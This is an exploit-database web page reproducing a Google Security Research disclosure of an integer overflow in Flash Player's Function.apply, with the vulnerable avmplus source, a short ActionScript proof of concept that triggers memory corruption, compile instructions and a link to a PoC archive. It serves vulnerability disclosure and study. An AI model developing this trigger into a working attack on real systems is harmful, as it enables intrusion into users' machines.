0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Flash Player Integer Overflow in Function.apply Exploit

Author

Google Security Research

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

CVE

Platform

Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
 
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]
 
VULNERABILITY DETAILS
An integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.
 
VERSION
Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
Operating System: Win7 x64 SP1
 
REPRODUCTION CASE
 
From exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp
 
944 // Specialized to be called from Function.apply(). 
945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) 
946 { 
947     int32_t argc = a->getLength(); 
 
...
  
966     // Tail call inhibited by local allocation/deallocation. 
967     MMgc::GC::AllocaAutoPtr _atomv; 
968     Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom));   //here if argc = 0xFFFFFFFF we get an integer overflow
969     atomv[0] = thisArg; 
970     for (int32_t i=0 ; i < argc ; i++ ) 
971         atomv[i+1] = a->getUintProperty(i); 
972     return env->coerceEnter(argc, atomv); 
973 } 
 
 
So the idea is to use the rest argument to get a working poc. For example:
 
    public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {
         
        try {a0.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a1.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a2.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a3.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a4.writeUnsignedInt(0x41414141)}catch (e) {}
         
    }
    public function XApplyPoc() {
        var a:Array = new Array()
        
        a.length = 0xFFFFFFFF
        myFunc.apply(this, a)
    }
 
Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Flash Player Integer Overflow in Function.apply Exploit

Report Error

Report Error